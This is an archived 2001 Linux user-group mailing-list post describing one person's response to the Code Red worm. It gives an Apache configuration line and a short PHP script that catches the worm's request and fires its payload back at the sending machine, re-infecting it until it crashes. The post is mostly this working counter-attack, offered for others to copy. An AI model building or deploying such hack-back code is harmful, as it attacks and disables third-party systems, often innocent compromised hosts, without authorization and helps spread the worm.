[olug] Code red
Brian Roberson
brian at bstc.net
Tue Aug 14 23:16:50 UTC 2001
I've been asked multiple times what I am doing about the code red worm (
and it predecessor ), so here is my story....
Update your httpd.conf to include the extension .ida as a php file ( you
have php installed right? ;-)
E.g.
#########
AddType application/x-httpd-php .php .php3 .ida
#########
And create this nifty little file, named default.ida in the root of your
web server directory:
##########################################
<?
$junk = getenv("QUERY_STRING");
$infected = getenv("REMOTE_ADDR");
$fp = fsockopen("$infected",80);
fputs($fp, "GET /default.ida?$junk\r\n");
fclose($fp);
?>
##########################################
Apparently you can infect a box multiple times, and eventually it will
crash itself ;-)
---------------------------------------------------------------------
To unsubscribe, e-mail: olug-unsubscribe at bstc.net
For additional commands, e-mail: olug-help at bstc.net
More information about the OLUG
mailing list